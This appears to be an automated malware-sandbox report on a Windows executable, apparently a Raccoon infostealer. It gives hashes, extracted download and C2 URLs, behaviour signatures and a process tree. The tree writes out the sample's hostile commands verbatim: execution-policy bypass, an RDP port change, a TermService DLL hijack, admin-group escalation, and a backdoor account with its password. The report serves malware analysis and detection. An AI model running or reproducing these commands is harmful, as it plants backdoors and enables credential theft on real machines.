Analysis
-
max time kernel
78s -
max time network
132s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
03-06-2021 13:06
Static task
static1
Behavioral task
behavioral1
Sample
66ee84542266e55c0215ca60869f1347.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
66ee84542266e55c0215ca60869f1347.exe
Resource
win10v20210408
General
-
Target
66ee84542266e55c0215ca60869f1347.exe
-
Size
567KB
-
MD5
66ee84542266e55c0215ca60869f1347
-
SHA1
147b6dd6bd7b0c5060ded97b844bb1494cf1ddb6
-
SHA256
143cf1724057f9b6a6630656e8735857d6146ff6dd0c2afc736545b46194437c
-
SHA512
ead9fc39d6fc972587b777151b040885b7df8eb4ea2bf305f259243915ef2bd190c9e4ea36999442b59b52054a75f07df9d8dd3f380841bb27a13c587b6da2ad
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
89ac909b803bacbc6cc523520599c4b9c029b033
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 20 2124 powershell.exe 22 2124 powershell.exe 23 2124 powershell.exe 24 2124 powershell.exe 26 2124 powershell.exe 28 2124 powershell.exe 30 2124 powershell.exe 32 2124 powershell.exe 34 2124 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
Y2AJbVsXcq.exepid process 1720 Y2AJbVsXcq.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 8 IoCs
Processes:
66ee84542266e55c0215ca60869f1347.exepid process 2988 66ee84542266e55c0215ca60869f1347.exe 2988 66ee84542266e55c0215ca60869f1347.exe 2988 66ee84542266e55c0215ca60869f1347.exe 2988 66ee84542266e55c0215ca60869f1347.exe 2988 66ee84542266e55c0215ca60869f1347.exe 2988 66ee84542266e55c0215ca60869f1347.exe 2832 2832 -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qbk1rc1e.mpq.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14B4.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14C4.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14D5.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vcd0fbpd.41a.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1444.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14A3.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2496 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 1384 powershell.exe 1384 powershell.exe 1384 powershell.exe 3808 powershell.exe 3808 powershell.exe 3808 powershell.exe 1244 powershell.exe 1244 powershell.exe 1244 powershell.exe 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 2124 powershell.exe 2124 powershell.exe 2124 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 1384 powershell.exe Token: SeIncreaseQuotaPrivilege 1384 powershell.exe Token: SeSecurityPrivilege 1384 powershell.exe Token: SeTakeOwnershipPrivilege 1384 powershell.exe Token: SeLoadDriverPrivilege 1384 powershell.exe Token: SeSystemProfilePrivilege 1384 powershell.exe Token: SeSystemtimePrivilege 1384 powershell.exe Token: SeProfSingleProcessPrivilege 1384 powershell.exe Token: SeIncBasePriorityPrivilege 1384 powershell.exe Token: SeCreatePagefilePrivilege 1384 powershell.exe Token: SeBackupPrivilege 1384 powershell.exe Token: SeRestorePrivilege 1384 powershell.exe Token: SeShutdownPrivilege 1384 powershell.exe Token: SeDebugPrivilege 1384 powershell.exe Token: SeSystemEnvironmentPrivilege 1384 powershell.exe Token: SeRemoteShutdownPrivilege 1384 powershell.exe Token: SeUndockPrivilege 1384 powershell.exe Token: SeManageVolumePrivilege 1384 powershell.exe Token: 33 1384 powershell.exe Token: 34 1384 powershell.exe Token: 35 1384 powershell.exe Token: 36 1384 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeIncreaseQuotaPrivilege 3808 powershell.exe Token: SeSecurityPrivilege 3808 powershell.exe Token: SeTakeOwnershipPrivilege 3808 powershell.exe Token: SeLoadDriverPrivilege 3808 powershell.exe Token: SeSystemProfilePrivilege 3808 powershell.exe Token: SeSystemtimePrivilege 3808 powershell.exe Token: SeProfSingleProcessPrivilege 3808 powershell.exe Token: SeIncBasePriorityPrivilege 3808 powershell.exe Token: SeCreatePagefilePrivilege 3808 powershell.exe Token: SeBackupPrivilege 3808 powershell.exe Token: SeRestorePrivilege 3808 powershell.exe Token: SeShutdownPrivilege 3808 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeSystemEnvironmentPrivilege 3808 powershell.exe Token: SeRemoteShutdownPrivilege 3808 powershell.exe Token: SeUndockPrivilege 3808 powershell.exe Token: SeManageVolumePrivilege 3808 powershell.exe Token: 33 3808 powershell.exe Token: 34 3808 powershell.exe Token: 35 3808 powershell.exe Token: 36 3808 powershell.exe Token: SeDebugPrivilege 1244 powershell.exe Token: SeIncreaseQuotaPrivilege 1244 powershell.exe Token: SeSecurityPrivilege 1244 powershell.exe Token: SeTakeOwnershipPrivilege 1244 powershell.exe Token: SeLoadDriverPrivilege 1244 powershell.exe Token: SeSystemProfilePrivilege 1244 powershell.exe Token: SeSystemtimePrivilege 1244 powershell.exe Token: SeProfSingleProcessPrivilege 1244 powershell.exe Token: SeIncBasePriorityPrivilege 1244 powershell.exe Token: SeCreatePagefilePrivilege 1244 powershell.exe Token: SeBackupPrivilege 1244 powershell.exe Token: SeRestorePrivilege 1244 powershell.exe Token: SeShutdownPrivilege 1244 powershell.exe Token: SeDebugPrivilege 1244 powershell.exe Token: SeSystemEnvironmentPrivilege 1244 powershell.exe Token: SeRemoteShutdownPrivilege 1244 powershell.exe Token: SeUndockPrivilege 1244 powershell.exe Token: SeManageVolumePrivilege 1244 powershell.exe Token: 33 1244 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
66ee84542266e55c0215ca60869f1347.execmd.exeY2AJbVsXcq.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2988 wrote to memory of 1720 2988 66ee84542266e55c0215ca60869f1347.exe Y2AJbVsXcq.exe PID 2988 wrote to memory of 1720 2988 66ee84542266e55c0215ca60869f1347.exe Y2AJbVsXcq.exe PID 2988 wrote to memory of 3580 2988 66ee84542266e55c0215ca60869f1347.exe cmd.exe PID 2988 wrote to memory of 3580 2988 66ee84542266e55c0215ca60869f1347.exe cmd.exe PID 2988 wrote to memory of 3580 2988 66ee84542266e55c0215ca60869f1347.exe cmd.exe PID 3580 wrote to memory of 2496 3580 cmd.exe timeout.exe PID 3580 wrote to memory of 2496 3580 cmd.exe timeout.exe PID 3580 wrote to memory of 2496 3580 cmd.exe timeout.exe PID 1720 wrote to memory of 2688 1720 Y2AJbVsXcq.exe powershell.exe PID 1720 wrote to memory of 2688 1720 Y2AJbVsXcq.exe powershell.exe PID 2688 wrote to memory of 996 2688 powershell.exe csc.exe PID 2688 wrote to memory of 996 2688 powershell.exe csc.exe PID 996 wrote to memory of 1284 996 csc.exe cvtres.exe PID 996 wrote to memory of 1284 996 csc.exe cvtres.exe PID 2688 wrote to memory of 1384 2688 powershell.exe powershell.exe PID 2688 wrote to memory of 1384 2688 powershell.exe powershell.exe PID 2688 wrote to memory of 3808 2688 powershell.exe powershell.exe PID 2688 wrote to memory of 3808 2688 powershell.exe powershell.exe PID 2688 wrote to memory of 1244 2688 powershell.exe powershell.exe PID 2688 wrote to memory of 1244 2688 powershell.exe powershell.exe PID 2688 wrote to memory of 3460 2688 powershell.exe reg.exe PID 2688 wrote to memory of 3460 2688 powershell.exe reg.exe PID 2688 wrote to memory of 1528 2688 powershell.exe reg.exe PID 2688 wrote to memory of 1528 2688 powershell.exe reg.exe PID 2688 wrote to memory of 3112 2688 powershell.exe reg.exe PID 2688 wrote to memory of 3112 2688 powershell.exe reg.exe PID 2688 wrote to memory of 3948 2688 powershell.exe net.exe PID 2688 wrote to memory of 3948 2688 powershell.exe net.exe PID 3948 wrote to memory of 1612 3948 net.exe net1.exe PID 3948 wrote to memory of 1612 3948 net.exe net1.exe PID 2688 wrote to memory of 3028 2688 powershell.exe cmd.exe PID 2688 wrote to memory of 3028 2688 powershell.exe cmd.exe PID 3028 wrote to memory of 1928 3028 cmd.exe cmd.exe PID 3028 wrote to memory of 1928 3028 cmd.exe cmd.exe PID 1928 wrote to memory of 212 1928 cmd.exe net.exe PID 1928 wrote to memory of 212 1928 cmd.exe net.exe PID 212 wrote to memory of 3120 212 net.exe net1.exe PID 212 wrote to memory of 3120 212 net.exe net1.exe PID 2688 wrote to memory of 3676 2688 powershell.exe cmd.exe PID 2688 wrote to memory of 3676 2688 powershell.exe cmd.exe PID 3676 wrote to memory of 3936 3676 cmd.exe cmd.exe PID 3676 wrote to memory of 3936 3676 cmd.exe cmd.exe PID 3936 wrote to memory of 2776 3936 cmd.exe net.exe PID 3936 wrote to memory of 2776 3936 cmd.exe net.exe PID 2776 wrote to memory of 3324 2776 net.exe net1.exe PID 2776 wrote to memory of 3324 2776 net.exe net1.exe PID 3952 wrote to memory of 2480 3952 cmd.exe net.exe PID 3952 wrote to memory of 2480 3952 cmd.exe net.exe PID 2480 wrote to memory of 3112 2480 net.exe net1.exe PID 2480 wrote to memory of 3112 2480 net.exe net1.exe PID 3428 wrote to memory of 2648 3428 cmd.exe net.exe PID 3428 wrote to memory of 2648 3428 cmd.exe net.exe PID 2648 wrote to memory of 2124 2648 net.exe net1.exe PID 2648 wrote to memory of 2124 2648 net.exe net1.exe PID 856 wrote to memory of 1324 856 cmd.exe net.exe PID 856 wrote to memory of 1324 856 cmd.exe net.exe PID 1324 wrote to memory of 2772 1324 net.exe net1.exe PID 1324 wrote to memory of 2772 1324 net.exe net1.exe PID 3004 wrote to memory of 1908 3004 cmd.exe net.exe PID 3004 wrote to memory of 1908 3004 cmd.exe net.exe PID 1908 wrote to memory of 2884 1908 net.exe net1.exe PID 1908 wrote to memory of 2884 1908 net.exe net1.exe PID 1484 wrote to memory of 3752 1484 cmd.exe net.exe PID 1484 wrote to memory of 3752 1484 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exe"C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmp" "c:\Users\Admin\AppData\Local\Temp\2n50zo5s\CSC396F2BCDAA27415EA11A9BA7FDC1FD5.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 27WEG86E /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc 27WEG86E /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 27WEG86E /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
